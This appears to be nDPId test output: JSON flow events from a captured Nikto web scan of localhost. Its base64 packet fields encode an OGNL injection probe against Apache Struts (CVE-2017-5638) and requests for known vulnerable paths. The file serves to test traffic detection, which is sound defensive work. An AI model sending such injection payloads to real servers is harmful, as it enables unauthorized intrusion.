-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} 
-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} 
-01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 